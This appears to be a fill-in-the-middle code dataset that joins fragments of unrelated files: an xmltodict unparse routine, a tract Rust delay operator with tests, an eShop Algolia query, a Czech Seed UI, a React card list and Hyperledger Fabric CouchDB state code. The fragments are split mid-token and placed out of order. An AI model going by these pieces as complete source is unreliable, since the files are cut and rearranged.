namespace_separator=':',
namespaces=None,
full_document=True):
key = _process_namespace(key, namespaces, namespace_separator, attr_prefix)
if preprocessor is not None:
result = preprocessor(key, value)
if result is None:
return
key, value = result
if (not hasattr(value, '__iter__')
or isinstance(value, _basestring)
or isinstance(value, dict)):
value = [value]
for index, v in enumerate(value):
if full_document and depth == 0 and index > 0:
raise ValueError('document with multiple roots')
if v is None:
v = OrderedDict()
elif isinstance(v, bool):
if v:
v = _unicode('true')
else:
v = _unicode('false')
elif not isinstance(v, dict):
v = _unicode(v)
if isinstance(v, _basestring):
v = OrderedDict(((cdata_key, v),))
cdata = None
attrs = OrderedDict()
children = []
for ik, iv in v.items():
if ik == cdata_key:
cdata = iv
continue
if ik.startswith(attr_prefix):
ik = _process_namespace(ik, namespaces, namespace_separator,
attr_prefix)
if ik == '@xmlns' and isinstance(iv, dict):
for k, v in iv.items():
attr = 'xmlns{0}'.format(':{0}'.format(k) if k else '')
attrs[attr] = _unicode(v)
continue
if not isinstance(iv, _unicode):
iv = _unicode(iv)
attrs[ik[len(attr_prefix):]] = iv
continue
children.append((ik, iv))
if pretty:
content_handler.ignorableWhitespace(depth * indent)
content_handler.startElement(key, AttributesImpl(attrs))
if pretty and children:
content_handler.ignorableWhitespace(newl)
for child_key, child_value in children:
_emit(child_key, child_value, content_handler,
attr_prefix, cdata_key, depth+1, preprocessor,
pretty, newl, indent, namespaces=namespaces,
namespace_separator=namespace_separator)
if cdata is not None:
content_handler.characters(cdata)
if pretty and children:
content_handler.ignorableWhitespace(depth * indent)
content_handler.endElement(key)
if pretty and depth:
content_handler.ignorableWhitespace(newl)
def unparse(input_dict, output=None, encoding='utf-8', full_document=True,
short_empty_elements=False,
**kwargs):
"""Emit an XML document for the given `input_dict` (reverse of `parse`).
The resulting XML document is returned as a string, but if `output` (a
file-like object) is specified, it is written there instead.
Dictionary keys prefixed with `attr_prefix` (default=`'@'`) are interpreted
as XML node attributes, whereas keys equal to `cdata_key`
(default=`'#text'`) are treated as character data.
The `pretty` parameter (default=`False`) enables pretty-printing. In this
mode, lines are terminated with `'\n'` and indented with `'\t'`, but this
can be customized with the `newl` and `indent` parameters.
"""
if full_document and len(input_dict) != 1:
raise ValueError('Document must have exactly one root.')
must_return = False
if output is None:
output = StringIO()
must_return = True
if short_empty_elements:
content_handler = XMLGenerator(output, encoding, True)
else:
content_handler = XMLGenerator(output, encoding)
if full_document:
content_handler.startDocument()
for key, value in input_dict.items():
_emit(key, value, content_handler, full_document=full_document,
**kwargs)
if full_document:
content_handler.endDocument()
if must_return:
value = output.getvalue()
try: # pragma no cover
value = value.decode(encoding)
except AttributeError: # pragma no cover
pass
return value
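# Illustrative usage (a hedged sketch mirroring the parse() examples above):
#
#     unparse({'a': {'@prop': 'x', 'b': ['1', '2']}})
#
# emits an XML document whose <a prop="x"> root contains two <b> children,
# i.e. the reverse of the parse() example in its docstring.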
if __name__ == '__main__': # pragma: no cover
import sys
import marshal
try:
stdin = sys.stdin.buffer
stdout = sys.stdout.buffer
except AttributeError:
stdin = sys.stdin
stdout = sys.stdout
(item_depth,) = sys.argv[1:]
item_depth = int(item_depth)
def handle_item(path, item):
marshal.dump((path, item), stdout)
return True
try:
root = parse(stdin,
item_depth=item_depth,
item_callback=handle_item,
dict_constructor=dict)
if item_depth == 0:
handle_item([], root)
except KeyboardInterrupt:
pass | dict_constructor=OrderedDict,
strip_whitespace=True,
namespace_separator=':',
namespaces=None, |
delay.rs | use crate::internal::*;
use crate::pulse::PulsedFact;
use ndarray::*;
#[derive(Debug, new, Clone)]
struct DelayState {
buffer: Tensor,
}
impl DelayState {
pub fn eval_t<T: Datum>(&mut self, op: &Delay, input: Arc<Tensor>) -> TractResult<Arc<Tensor>> {
let axis = Axis(op.axis);
let input = input.to_array_view::<T>()?;
let mut buffer = self.buffer.to_array_view_mut::<T>()?;
let buffered = op.delay + op.overlap;
let input_pulse = input.shape()[op.axis];
let output_pulse = input_pulse + op.overlap;
let mut output_shape: TVec<usize> = input.shape().into();
output_shape[op.axis] = output_pulse;
// build output
let output = if op.delay < input_pulse {
let mut output = unsafe { Tensor::uninitialized::<T>(&*output_shape)? };
let from_input = input_pulse - op.delay;
let from_buffer = output_pulse - from_input;
output
.to_array_view_mut::<T>()?
.slice_axis_mut(axis, Slice::from(..from_buffer))
.assign(&buffer.slice_axis(axis, Slice::from(..from_buffer)));
output
.to_array_view_mut::<T>()?
.slice_axis_mut(axis, Slice::from(from_buffer..))
.assign(&input.slice_axis(axis, Slice::from(..from_input)));
output
} else {
buffer.slice_axis(axis, Slice::from(..output_pulse)).to_owned().into_tensor()
};
// maintain buffer
if buffered < input_pulse {
buffer.assign(&input.slice_axis(axis, Slice::from((input_pulse - buffered)..)));
} else {
let stride = buffer.strides()[op.axis] as usize * input_pulse;
buffer.as_slice_mut().unwrap().rotate_left(stride);
buffer.slice_axis_mut(axis, Slice::from((buffered - input_pulse)..)).assign(&input);
}
let output = output.into_arc_tensor();
Ok(output)
}
}
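// Worked example (added for clarity; not in the original source): with axis = 0,
// delay = 2, overlap = 0 and an input pulse of 4, `buffered` is 2 and the first
// branch above runs: the first 2 output values come from the buffer (data carried
// over from the previous call) and the remaining 2 from the start of the current
// input; the buffer is then refreshed with the last 2 input values, so every value
// is emitted exactly 2 positions later than it arrived.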
impl OpState for DelayState {
fn | (
&mut self,
_state: &mut SessionState,
op: &dyn Op,
mut inputs: TVec<Arc<Tensor>>,
) -> TractResult<TVec<Arc<Tensor>>> {
let input = args_1!(inputs);
let op = op.downcast_ref::<Delay>().ok_or("Wrong Op type")?;
Ok(tvec!(dispatch_datum!(Self::eval_t(input.datum_type())(self, op, input))?))
}
}
#[derive(Clone, Debug, PartialEq, Hash)]
pub struct Delay {
datum_type: DatumType,
buffer_shape: TVec<usize>,
axis: usize,
delay: usize,
overlap: usize,
}
tract_linalg::impl_dyn_hash!(Delay);
impl Delay {
pub fn new(input_fact: &PulsedFact, delay: usize, overlap: usize) -> Delay {
let axis = input_fact.axis;
let mut buffer_shape = input_fact.shape.clone();
buffer_shape[axis] = delay + overlap;
Delay { datum_type: input_fact.datum_type, buffer_shape, axis, delay, overlap }
}
}
impl Op for Delay {
fn name(&self) -> Cow<str> {
"Delay".into()
}
fn info(&self) -> TractResult<Vec<String>> {
Ok(vec![
format!("axis: {} delay: {} overlap: {}", self.axis, self.delay, self.overlap),
format!("buffer: {:?} {:?}", self.buffer_shape, self.datum_type),
])
}
canonic!();
op_core_lir_mir!();
impl_op_same_as!();
op_as_typed_op!();
op_as_pulsed_op!();
}
impl StatefullOp for Delay {
fn state(
&self,
_session: &mut SessionState,
_node_id: usize,
) -> TractResult<Option<Box<dyn OpState>>> {
let buffer = unsafe { Tensor::uninitialized_dt(self.datum_type, &*self.buffer_shape)? };
Ok(Some(Box::new(DelayState { buffer })))
}
}
impl TypedOp for Delay {
as_op!();
fn output_facts(&self, inputs: &[&TypedFact]) -> TractResult<TVec<TypedFact>> {
let mut fact = inputs[0].clone();
fact.shape.set_dim(self.axis, fact.shape.dim(self.axis) + self.overlap)?;
Ok(tvec!(fact))
}
fn cost(&self, _inputs: &[&TypedFact]) -> TractResult<TVec<(Cost, TDim)>> {
Ok(tvec!((
Cost::Buffer(self.datum_type),
self.buffer_shape.iter().product::<usize>().to_dim()
)))
}
}
impl PulsedOp for Delay {
fn pulsed_output_facts(&self, inputs: &[&PulsedFact]) -> TractResult<TVec<PulsedFact>> {
let mut fact = inputs[0].clone();
fact.shape[self.axis] += self.overlap;
fact.delay += self.delay + self.overlap;
Ok(tvec!(fact))
}
as_op!();
pulsed_op_to_typed_op!();
}
#[cfg(test)]
mod test {
use super::*;
use crate::*;
fn test_pulse_delay_over(pulse: usize, delay: usize, overlap: usize) {
let mut model = PulsedModel::default();
let fact1 = PulsedFact {
datum_type: u8::datum_type(),
shape: tvec![pulse],
axis: 0,
dim: TDim::s(),
delay: 0,
};
let source = model.add_source("source", fact1.clone()).unwrap();
model.wire_node("delay", Delay::new(&fact1, delay, overlap), &[source]).unwrap();
model.auto_outputs().unwrap();
let plan = SimplePlan::new(model).unwrap();
let mut state = crate::plan::SimpleState::new(plan).unwrap();
for i in 0..5 {
let input: Vec<u8> = (pulse * i..(pulse * (i + 1))).map(|a| a as u8).collect();
let expect: Vec<u8> = (pulse * i..(pulse * (i + 1) + overlap))
.map(|i| i.saturating_sub(delay + overlap) as u8)
.collect();
let output = state.run(tvec!(Tensor::from(arr1(&input)))).unwrap();
let skip = (delay + overlap).saturating_sub(i * pulse).min(pulse + overlap);
assert_eq!(&output[0].as_slice::<u8>().unwrap()[skip..], &expect[skip..]);
}
}
#[test]
fn sub_pulse() {
test_pulse_delay_over(4, 1, 0);
}
#[test]
fn supra_pulse() {
test_pulse_delay_over(4, 5, 0);
}
#[test]
fn sub_pulse_context() {
test_pulse_delay_over(4, 0, 2);
}
#[test]
fn supra_pulse_context() {
test_pulse_delay_over(4, 0, 6);
}
#[test]
fn test_two_delays() {
let pulse = 4;
let mut model = PulsedModel::default();
let fact_0 = PulsedFact {
datum_type: u8::datum_type(),
shape: tvec![pulse],
axis: 0,
dim: TDim::s(),
delay: 0,
};
let source = model.add_source("source", fact_0.clone()).unwrap();
let delay_1 = model.wire_node("delay-1", Delay::new(&fact_0, 2, 0), &[source]).unwrap()[0];
let fact_1 = model.outlet_fact(delay_1).unwrap().clone();
let delay_2 = model.wire_node("delay-1", Delay::new(&fact_1, 2, 0), &[delay_1]).unwrap();
model.set_output_outlets(&delay_2).unwrap();
let plan = SimplePlan::new(model).unwrap();
let mut state = crate::plan::SimpleState::new(plan).unwrap();
for i in 0..5 {
let input: Vec<u8> = (pulse * i..(pulse * (i + 1))).map(|a| a as u8).collect();
let expect: Vec<u8> =
(pulse * i..(pulse * (i + 1))).map(|i| i.saturating_sub(4) as u8).collect();
let skip = 4usize.saturating_sub(i * pulse).min(pulse);
let output = state.run(tvec!(Tensor::from(arr1(&input)))).unwrap();
assert_eq!(&output[0].as_slice::<u8>().unwrap()[skip..], &expect[skip..]);
}
}
}
| eval |
getQueriedGamesAmerica.ts | import fetch from 'node-fetch';
import { stringify } from 'querystring';
import { QUERIED_US_ALGOLIA_KEY, US_ALGOLIA_HEADERS, QUERIED_US_GET_GAMES_URL } from '../utils/constants';
import type { QueriedGameResult, QueriedGamesAmericaOptions, QueriedGameUS } from '../utils/interfaces';
import { EshopError } from '../utils/utils';
/**
* Fetches a subset of games from the American e-shops as based on a given query
* @param query The query to search for
* @param __namedParameters Additional options for the [[getQueriedGamesAmerica]] call. Defaults to `{ hitsPerPage: 200, page: 0 }`
* @returns Promise containing the first `hitsPerPage` games that match your query
* @license Apache-2.0 Favna & Antonio Román
* @copyright 2019
*/
export const getQueriedGamesAmerica = async (
query: string,
{ hitsPerPage = 200, page = 0 }: QueriedGamesAmericaOptions = { hitsPerPage: 200, page: 0 }
): Promise<QueriedGameUS[]> => {
const response = await fetch(QUERIED_US_GET_GAMES_URL, {
method: 'POST',
headers: {
...US_ALGOLIA_HEADERS,
'X-Algolia-API-Key': QUERIED_US_ALGOLIA_KEY
},
body: JSON.stringify({
params: stringify({
hitsPerPage,
page,
query
})
})
});
  if (!response.ok) throw new EshopError(`Fetching games for the query "${query}" failed`); | if (!hits.length) throw new EshopError(`No game results for the query "${query}"`);
return hits;
}; |
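// Illustrative usage (hedged; the query string and logging are only an example):
//   const games = await getQueriedGamesAmerica('Mario');
//   console.log(`${games.length} hits for "Mario"`);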
const { hits }: QueriedGameResult = await response.json();
|
subjects.rs | use uuid::Uuid;
use seed::{prelude::*, *};
use crate::{
Msg,
Model,
models::Kind,
};
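// Translation note (added for readability): the UI strings below are Czech.
// "Předměty" = "Subjects", "Přírodovědné" = "Sciences", "Humanitní" = "Humanities",
// "Ostatní" = "Other", "Zapsat se" = "Sign up", "Vyučující" = "Teacher";
// `nazev` and `popis` mean "name" and "description".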
fn nazev(n: &str) -> Node<Msg> {
header![
h4![n]
]
}
fn popis(u: &str, p: &str) -> Vec<Node<Msg>> {
vec![
p![
b!["Vyučující: "],
u
],
p![p]
]
}
fn footer(id: Uuid) -> Node<Msg> {
footer![
a![
attrs!{At::Class => "button dark"},
simple_ev(Ev::Click, Msg::SignUp(id)),
"Zapsat se"
]
]
}
fn sub | : Uuid, n: &str, u: &str, p: &str) -> Node<Msg> {
let store = seed::storage::get_storage().unwrap();
let typ: String = store.get_item("typ").unwrap().unwrap_or_default();
section![
attrs!{At::Class => "card"},
style![
St::MarginTop => "1em",
],
nazev(n),
popis(u, p),
match typ.replace('"', "").as_str() {
"student" => footer(id),
_ => br![]
}
]
}
pub(crate) fn view(model: &Model) -> Vec<Node<Msg>> {
vec![
h2!["Předměty"],
section![
attrs!{At::Class => "row"},
section![
attrs!{At::Class => "col"},
h3!["Přírodovědné"],
model.subjects
.iter()
.filter(|x| x.kind == Kind::Science)
.map(|x| subject(x.id, &x.name, &model.teachers.iter().find(|u| x.teacher == u.id).unwrap().name, &x.description))
.collect::<Vec<_>>()
],
section![
attrs!{At::Class => "col"},
h3!["Humanitní"],
model.subjects
.iter()
.filter(|x| x.kind == Kind::Humanity)
.map(|x| subject(x.id, &x.name, &model.teachers.iter().find(|u| x.teacher == u.id).unwrap().name, &x.description))
.collect::<Vec<_>>()
],
section![
attrs!{At::Class => "col"},
h3!["Ostatní"],
model.subjects
.iter()
.filter(|x| x.kind == Kind::Other)
.map(|x| subject(x.id, &x.name, &model.teachers.iter().find(|u| x.teacher == u.id).unwrap().name, &x.description))
.collect::<Vec<_>>()
],
]
]
}
| ject(id |
App.tsx | import React from "react";
import { Link } from "react-router-dom";
import { cards } from "../links";
export default function App() {
return (
<div className="row mt-5">
{cards.map((item: any, index: number) => {
return (
<div className="col-md-4" key={index}>
<div className="card" style={{ width: "18rem" }}>
<div className="card-body">
<h5 className="card-title">{item.title}</h5>
<p className="card-text">{item.text}</p>
<button className="btn btn-primary">
<Link
className="text-white text-decoration-none" | </Link>
</button>
</div>
</div>
</div>
);
})}
</div>
);
} | to={item.link}
>
{item.linkText} |
statecouchdb.go | /*
Copyright IBM Corp. All Rights Reserved.
SPDX-License-Identifier: Apache-2.0
*/
package statecouchdb
import (
"bytes"
"context"
"encoding/json"
"sort"
"sync"
"github.com/hyperledger/fabric/common/flogging"
"github.com/hyperledger/fabric/common/ledger/dataformat"
"github.com/hyperledger/fabric/common/metrics"
"github.com/hyperledger/fabric/core/ledger"
"github.com/hyperledger/fabric/core/ledger/internal/version"
"github.com/hyperledger/fabric/core/ledger/kvledger/txmgmt/statedb"
"github.com/pkg/errors"
)
var logger = flogging.MustGetLogger("statecouchdb")
const (
// savepointDocID is used as a key for maintaining savepoint (maintained in metadatadb for a channel)
savepointDocID = "statedb_savepoint"
// channelMetadataDocID is used as a key to store the channel metadata for a channel (maintained in the channel's metadatadb).
	// Due to CouchDB's length restriction on db names, channel names and namespaces may be truncated in db names.
// The metadata is used for dropping channel-specific databases and snapshot support.
channelMetadataDocID = "channel_metadata"
// fabricInternalDBName is used to create a db in couch that would be used for internal data such as the version of the data format
// a double underscore ensures that the dbname does not clash with the dbnames created for the chaincodes
fabricInternalDBName = "fabric__internal"
// dataformatVersionDocID is used as a key for maintaining version of the data format (maintained in fabric internal db)
dataformatVersionDocID = "dataformatVersion"
fullScanIteratorValueFormat = byte(1)
)
// VersionedDBProvider implements interface VersionedDBProvider
type VersionedDBProvider struct {
couchInstance *couchInstance
databases map[string]*VersionedDB
mux sync.Mutex
openCounts uint64
redoLoggerProvider *redoLoggerProvider
cache *cache
}
// NewVersionedDBProvider instantiates VersionedDBProvider
func NewVersionedDBProvider(config *ledger.CouchDBConfig, metricsProvider metrics.Provider, sysNamespaces []string) (*VersionedDBProvider, error) {
logger.Debugf("constructing CouchDB VersionedDBProvider")
couchInstance, err := createCouchInstance(config, metricsProvider)
if err != nil {
return nil, err
}
if err := checkExpectedDataformatVersion(couchInstance); err != nil {
return nil, err
}
p, err := newRedoLoggerProvider(config.RedoLogPath)
if err != nil {
return nil, err
}
cache := newCache(config.UserCacheSizeMBs, sysNamespaces)
return &VersionedDBProvider{
couchInstance: couchInstance,
databases: make(map[string]*VersionedDB),
mux: sync.Mutex{},
openCounts: 0,
redoLoggerProvider: p,
cache: cache,
},
nil
}
func checkExpectedDataformatVersion(couchInstance *couchInstance) error {
databasesToIgnore := []string{fabricInternalDBName}
isEmpty, err := couchInstance.isEmpty(databasesToIgnore)
if err != nil {
return err
}
if isEmpty {
logger.Debugf("couch instance is empty. Setting dataformat version to %s", dataformat.CurrentFormat)
return writeDataFormatVersion(couchInstance, dataformat.CurrentFormat)
}
dataformatVersion, err := readDataformatVersion(couchInstance)
if err != nil {
return err
}
if dataformatVersion != dataformat.CurrentFormat {
return &dataformat.ErrFormatMismatch{
DBInfo: "CouchDB for state database",
ExpectedFormat: dataformat.CurrentFormat,
Format: dataformatVersion,
}
}
return nil
}
func readDataformatVersion(couchInstance *couchInstance) (string, error) {
db, err := createCouchDatabase(couchInstance, fabricInternalDBName)
if err != nil {
return "", err
}
doc, _, err := db.readDoc(dataformatVersionDocID)
logger.Debugf("dataformatVersionDoc = %s", doc)
if err != nil || doc == nil {
return "", err
}
return decodeDataformatInfo(doc)
}
func writeDataFormatVersion(couchInstance *couchInstance, dataformatVersion string) error {
db, err := createCouchDatabase(couchInstance, fabricInternalDBName)
if err != nil {
return err
}
doc, err := encodeDataformatInfo(dataformatVersion)
if err != nil {
return err
}
if _, err := db.saveDoc(dataformatVersionDocID, "", doc); err != nil {
return err
}
dbResponse, err := db.ensureFullCommit()
if err != nil {
return err
}
if !dbResponse.Ok {
logger.Errorf("failed to perform full commit while writing dataformat version")
return errors.New("failed to perform full commit while writing dataformat version")
}
return nil
}
// GetDBHandle gets the handle to a named database
func (provider *VersionedDBProvider) GetDBHandle(dbName string) (statedb.VersionedDB, error) {
provider.mux.Lock()
defer provider.mux.Unlock()
vdb := provider.databases[dbName]
if vdb == nil {
var err error
vdb, err = newVersionedDB(
provider.couchInstance,
provider.redoLoggerProvider.newRedoLogger(dbName),
dbName,
provider.cache,
)
if err != nil {
return nil, err
}
provider.databases[dbName] = vdb
}
return vdb, nil
}
// Close closes the underlying db instance
func (provider *VersionedDBProvider) Close() {
// No close needed on Couch
provider.redoLoggerProvider.close()
}
// HealthCheck checks to see if the couch instance of the peer is healthy
func (provider *VersionedDBProvider) HealthCheck(ctx context.Context) error {
return provider.couchInstance.healthCheck(ctx)
}
// VersionedDB implements VersionedDB interface
type VersionedDB struct {
couchInstance *couchInstance
metadataDB *couchDatabase // A database per channel to store metadata such as savepoint.
chainName string // The name of the chain/channel.
namespaceDBs map[string]*couchDatabase // One database per namespace.
channelMetadata *channelMetadata // Store channel name and namespaceDBInfo
committedDataCache *versionsCache // Used as a local cache during bulk processing of a block.
verCacheLock sync.RWMutex
mux sync.RWMutex
redoLogger *redoLogger
cache *cache
}
// newVersionedDB constructs an instance of VersionedDB
func newVersionedDB(couchInstance *couchInstance, redoLogger *redoLogger, dbName string, cache *cache) (*VersionedDB, error) {
// CreateCouchDatabase creates a CouchDB database object, as well as the underlying database if it does not exist
chainName := dbName
dbName = constructMetadataDBName(dbName)
metadataDB, err := createCouchDatabase(couchInstance, dbName)
if err != nil {
return nil, err
}
namespaceDBMap := make(map[string]*couchDatabase)
vdb := &VersionedDB{
couchInstance: couchInstance,
metadataDB: metadataDB,
chainName: chainName,
namespaceDBs: namespaceDBMap,
committedDataCache: newVersionCache(),
redoLogger: redoLogger,
cache: cache,
}
vdb.channelMetadata, err = vdb.readChannelMetadata()
if err != nil {
return nil, err
}
if vdb.channelMetadata == nil {
vdb.channelMetadata = &channelMetadata{
ChannelName: chainName,
NamespaceDBsInfo: make(map[string]*namespaceDBInfo),
}
if err = vdb.writeChannelMetadata(); err != nil {
return nil, err
}
}
logger.Debugf("chain [%s]: checking for redolog record", chainName)
redologRecord, err := redoLogger.load()
if err != nil {
return nil, err
}
savepoint, err := vdb.GetLatestSavePoint()
if err != nil {
return nil, err
}
// in normal circumstances, redolog is expected to be either equal to the last block
// committed to the statedb or one ahead (in the event of a crash). However, either of
// these or both could be nil on first time start (fresh start/rebuild)
if redologRecord == nil || savepoint == nil {
logger.Debugf("chain [%s]: No redo-record or save point present", chainName)
return vdb, nil
}
logger.Debugf("chain [%s]: save point = %#v, version of redolog record = %#v",
chainName, savepoint, redologRecord.Version)
if redologRecord.Version.BlockNum-savepoint.BlockNum == 1 {
logger.Debugf("chain [%s]: Re-applying last batch", chainName)
if err := vdb.applyUpdates(redologRecord.UpdateBatch, redologRecord.Version); err != nil {
return nil, err
}
}
return vdb, nil
}
// getNamespaceDBHandle gets the handle to a named chaincode database
func (vdb *VersionedDB) getNamespaceDBHandle(namespace string) (*couchDatabase, error) {
vdb.mux.RLock()
db := vdb.namespaceDBs[namespace]
vdb.mux.RUnlock()
if db != nil {
return db, nil
}
namespaceDBName := constructNamespaceDBName(vdb.chainName, namespace)
vdb.mux.Lock()
defer vdb.mux.Unlock()
db = vdb.namespaceDBs[namespace]
if db == nil {
var err error
if _, ok := vdb.channelMetadata.NamespaceDBsInfo[namespace]; !ok {
logger.Debugf("[%s] add namespaceDBInfo for namespace %s", vdb.chainName, namespace)
vdb.channelMetadata.NamespaceDBsInfo[namespace] = &namespaceDBInfo{
Namespace: namespace,
DBName: namespaceDBName,
}
if err = vdb.writeChannelMetadata(); err != nil {
return nil, err
}
}
db, err = createCouchDatabase(vdb.couchInstance, namespaceDBName)
if err != nil {
return nil, err
}
vdb.namespaceDBs[namespace] = db
}
return db, nil
}
// ProcessIndexesForChaincodeDeploy creates indexes for a specified namespace
func (vdb *VersionedDB) ProcessIndexesForChaincodeDeploy(namespace string, indexFilesData map[string][]byte) error {
db, err := vdb.getNamespaceDBHandle(namespace)
if err != nil {
return err
}
// We need to satisfy two requirements while processing the index files.
// R1: all valid indexes should be processed.
// R2: the order of index creation must be the same in all peers. For example, if user
// passes two index files with the same index name but different index fields and we
// process these files in different orders in different peers, each peer would
	// have different indexes (as one index definition could replace another if the index names
// are the same).
// To satisfy R1, we log the error and continue to process the next index file.
// To satisfy R2, we sort the indexFilesData map based on the filenames and process
// each index as per the sorted order.
var indexFilesName []string
for fileName := range indexFilesData {
indexFilesName = append(indexFilesName, fileName)
}
sort.Strings(indexFilesName)
for _, fileName := range indexFilesName {
_, err = db.createIndex(string(indexFilesData[fileName]))
switch {
case err != nil:
logger.Errorf("error creating index from file [%s] for chaincode [%s] on channel [%s]: %+v",
fileName, namespace, vdb.chainName, err)
default:
logger.Infof("successfully submitted index creation request present in the file [%s] for chaincode [%s] on channel [%s]",
fileName, namespace, vdb.chainName)
}
}
return nil
}
// GetDBType returns the hosted stateDB
func (vdb *VersionedDB) GetDBType() string {
return "couchdb"
}
// LoadCommittedVersions populates committedVersions and revisionNumbers into cache.
// A bulk retrieve from couchdb is used to populate the cache.
// committedVersions cache will be used for state validation of readsets
// revisionNumbers cache will be used during commit phase for couchdb bulk updates
func (vdb *VersionedDB) LoadCommittedVersions(keys []*statedb.CompositeKey) error {
missingKeys := map[string][]string{}
committedDataCache := newVersionCache()
for _, compositeKey := range keys {
ns, key := compositeKey.Namespace, compositeKey.Key
committedDataCache.setVerAndRev(ns, key, nil, "")
logger.Debugf("Load into version cache: %s~%s", ns, key)
if !vdb.cache.enabled(ns) {
missingKeys[ns] = append(missingKeys[ns], key)
continue
}
cv, err := vdb.cache.getState(vdb.chainName, ns, key)
if err != nil {
return err
}
if cv == nil {
missingKeys[ns] = append(missingKeys[ns], key)
continue
}
vv, err := constructVersionedValue(cv)
if err != nil {
return err
}
rev := string(cv.AdditionalInfo)
committedDataCache.setVerAndRev(ns, key, vv.Version, rev)
}
nsMetadataMap, err := vdb.retrieveMetadata(missingKeys)
logger.Debugf("missingKeys=%s", missingKeys)
logger.Debugf("nsMetadataMap=%s", nsMetadataMap)
if err != nil {
return err
}
for ns, nsMetadata := range nsMetadataMap {
for _, keyMetadata := range nsMetadata {
// TODO - why would version be ever zero if loaded from db?
if len(keyMetadata.Version) != 0 {
version, _, err := decodeVersionAndMetadata(keyMetadata.Version)
if err != nil {
return err
}
committedDataCache.setVerAndRev(ns, keyMetadata.ID, version, keyMetadata.Rev)
}
}
}
vdb.verCacheLock.Lock()
defer vdb.verCacheLock.Unlock()
vdb.committedDataCache = committedDataCache
return nil
}
// GetVersion implements method in VersionedDB interface
func (vdb *VersionedDB) GetVersion(namespace string, key string) (*version.Height, error) {
version, keyFound := vdb.GetCachedVersion(namespace, key)
if !keyFound {
// This if block get executed only during simulation because during commit
// we always call `LoadCommittedVersions` before calling `GetVersion`
vv, err := vdb.GetState(namespace, key)
if err != nil || vv == nil {
return nil, err
}
version = vv.Version
}
return version, nil
}
// GetCachedVersion returns version from cache. `LoadCommittedVersions` function populates the cache
func (vdb *VersionedDB) GetCachedVersion(namespace string, key string) (*version.Height, bool) {
logger.Debugf("Retrieving cached version: %s~%s", key, namespace)
vdb.verCacheLock.RLock()
defer vdb.verCacheLock.RUnlock()
return vdb.committedDataCache.getVersion(namespace, key)
}
// ValidateKeyValue implements method in VersionedDB interface
func (vdb *VersionedDB) ValidateKeyValue(key string, value []byte) error {
err := validateKey(key)
if err != nil {
return err
}
return validateValue(value)
}
// BytesKeySupported implements method in VersionedDB interface
func (vdb *VersionedDB) BytesKeySupported() bool {
return false
}
// GetState implements method in VersionedDB interface
func (vdb *VersionedDB) GetState(namespace string, key string) (*statedb.VersionedValue, error) {
logger.Debugf("GetState(). ns=%s, key=%s", namespace, key)
// (1) read the KV from the cache if available
cacheEnabled := vdb.cache.enabled(namespace)
if cacheEnabled {
cv, err := vdb.cache.getState(vdb.chainName, namespace, key)
if err != nil {
return nil, err
}
if cv != nil {
vv, err := constructVersionedValue(cv)
if err != nil {
return nil, err
}
return vv, nil
}
}
// (2) read from the database if cache miss occurs
kv, err := vdb.readFromDB(namespace, key)
if err != nil {
return nil, err
}
if kv == nil {
return nil, nil
}
// (3) if the value is not nil, store in the cache
if cacheEnabled {
cacheValue := constructCacheValue(kv.VersionedValue, kv.revision)
if err := vdb.cache.putState(vdb.chainName, namespace, key, cacheValue); err != nil {
return nil, err
}
}
return kv.VersionedValue, nil
}
func (vdb *VersionedDB) readFromDB(namespace, key string) (*keyValue, error) {
db, err := vdb.getNamespaceDBHandle(namespace)
if err != nil {
return nil, err
}
couchDoc, _, err := db.readDoc(key)
if err != nil {
return nil, err
}
if couchDoc == nil {
return nil, nil
}
kv, err := couchDocToKeyValue(couchDoc)
if err != nil {
return nil, err
}
return kv, nil
}
// GetStateMultipleKeys implements method in VersionedDB interface
func (vdb *VersionedDB) GetStateMultipleKeys(namespace string, keys []string) ([]*statedb.VersionedValue, error) {
vals := make([]*statedb.VersionedValue, len(keys))
for i, key := range keys {
val, err := vdb.GetState(namespace, key)
if err != nil {
return nil, err
}
vals[i] = val
}
return vals, nil
}
// GetStateRangeScanIterator implements method in VersionedDB interface
// startKey is inclusive
// endKey is exclusive
func (vdb *VersionedDB) GetStateRangeScanIterator(namespace string, startKey string, endKey string) (statedb.ResultsIterator, error) {
return vdb.GetStateRangeScanIteratorWithPagination(namespace, startKey, endKey, 0)
}
// GetStateRangeScanIteratorWithPagination implements method in VersionedDB interface
// startKey is inclusive
// endKey is exclusive
// pageSize limits the number of results returned
func (vdb *VersionedDB) GetStateRangeScanIteratorWithPagination(namespace string, startKey string, endKey string, pageSize int32) (statedb.QueryResultsIterator, error) {
logger.Debugf("Entering GetStateRangeScanIteratorWithPagination namespace: %s startKey: %s endKey: %s pageSize: %d", namespace, startKey, endKey, pageSize)
internalQueryLimit := vdb.couchInstance.internalQueryLimit()
db, err := vdb.getNamespaceDBHandle(namespace)
if err != nil {
return nil, err
}
return newQueryScanner(namespace, db, "", internalQueryLimit, pageSize, "", startKey, endKey)
}
func (scanner *queryScanner) getNextStateRangeScanResults() error {
queryLimit := scanner.queryDefinition.internalQueryLimit
if scanner.paginationInfo.requestedLimit > 0 {
moreResultsNeeded := scanner.paginationInfo.requestedLimit - scanner.resultsInfo.totalRecordsReturned
if moreResultsNeeded < scanner.queryDefinition.internalQueryLimit {
queryLimit = moreResultsNeeded
}
}
queryResult, nextStartKey, err := rangeScanFilterCouchInternalDocs(scanner.db,
scanner.queryDefinition.startKey, scanner.queryDefinition.endKey, queryLimit)
if err != nil |
scanner.resultsInfo.results = queryResult
scanner.paginationInfo.cursor = 0
if scanner.queryDefinition.endKey == nextStartKey {
// as we always set inclusive_end=false to match the behavior of
// goleveldb iterator, it is safe to mark the scanner as exhausted
scanner.exhausted = true
// we still need to update the startKey as it is returned as bookmark
}
scanner.queryDefinition.startKey = nextStartKey
return nil
}
func rangeScanFilterCouchInternalDocs(db *couchDatabase,
startKey, endKey string, queryLimit int32,
) ([]*queryResult, string, error) {
var finalResults []*queryResult
var finalNextStartKey string
for {
results, nextStartKey, err := db.readDocRange(startKey, endKey, queryLimit)
if err != nil {
logger.Debugf("Error calling ReadDocRange(): %s\n", err.Error())
return nil, "", err
}
var filteredResults []*queryResult
for _, doc := range results {
if !isCouchInternalKey(doc.id) {
filteredResults = append(filteredResults, doc)
}
}
finalResults = append(finalResults, filteredResults...)
finalNextStartKey = nextStartKey
queryLimit = int32(len(results) - len(filteredResults))
if queryLimit == 0 || finalNextStartKey == "" {
break
}
startKey = finalNextStartKey
}
var err error
for i := 0; isCouchInternalKey(finalNextStartKey); i++ {
_, finalNextStartKey, err = db.readDocRange(finalNextStartKey, endKey, 1)
logger.Debugf("i=%d, finalNextStartKey=%s", i, finalNextStartKey)
if err != nil {
return nil, "", err
}
}
return finalResults, finalNextStartKey, nil
}
func isCouchInternalKey(key string) bool {
